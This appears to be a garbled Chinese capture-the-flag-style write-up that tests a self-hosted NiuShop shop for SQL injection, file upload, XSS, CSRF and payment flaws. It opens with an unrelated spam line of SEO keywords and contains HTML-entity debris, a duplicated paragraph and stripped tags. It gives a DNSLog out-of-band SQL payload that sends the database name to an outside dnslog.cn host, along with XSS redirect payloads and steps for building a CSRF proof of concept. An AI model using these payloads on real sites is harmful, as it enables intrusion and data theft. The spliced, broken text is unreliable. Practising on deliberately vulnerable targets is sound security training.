网站制作的基本步骤,郑州货拉拉,wordpress自定义百度分享,郑州购物网站建设靶场搭建
将 niushop-master.zip 压缩包放到网站的根目录#xff0c;解压后访问 浏览器访问 install.php #xff0c;根据提示安装即可 1.SQL注入漏洞
随便选择一种商品分类#xff0c;发现有参数#xff0c;测试注入 测试闭合发现页面报错有sql注入 应该是环境的问题解压后访问 浏览器访问 install.php 根据提示安装即可 1.SQL注入漏洞
随便选择一种商品分类发现有参数测试注入 测试闭合发现页面报错有sql注入 应该是环境的问题但是这不影响我们判断存在sql注入
该网站还有一处sql注入漏洞我们可以进入后台系统--设置--数据库管理--SQL执行与导入 输入查询语句点击执行成功执行但是我们得不到具体信息这时需要利用外带注入方法 外带原理将dnslog平台中的特有字段payload带⼊⽬标发起dns请求通过dns解析将请求后的关键信息组合新的三级域名带出在dns服务器的dns⽇志中显示出来 DNSLog Platform select load_file(concat(\\\\,(select database()),.95xpzc.dnslog.cn\\abc))
文件上传漏洞
1.首先写一个一句话木马 XSS漏洞
反射型xss漏洞
登录后台系统--设置--基础设置--商城第三方统计代码 在输入框中输入js弹窗代码,然后点击提交
scriptalert(1)/script
返回前端页面刷新出现弹窗 后台系统还有一处反射型xss漏洞点击网站--广告位--添加广告 scriptalert(1)/script 返回前端刷新点击该广告页面会出现弹窗
存储型xss漏洞
后台系统还有一处点击网站--广告位--添加广告 这里的 链接地址 可以尝试xss 在自己网站的根目录新建一个 2.html 文件内容如下
scriptdocument.locationhttp://www.baidu.com/script 链接地址修改为www下的 2.html 返回前端刷新页面点击此广告页面就会跳转到设置的界面 CSRF漏洞
注册一个普通用户登录以后修改基本信息 使用bp抓取提交信息的请求包鼠标右键--相关工具--生成CSRF-Poc--复制HTML 将复制的内容放到自己本地网站的根目录浏览器访问 点击按钮就会发现用户信息被修改说明存在CSRF漏洞 支付漏洞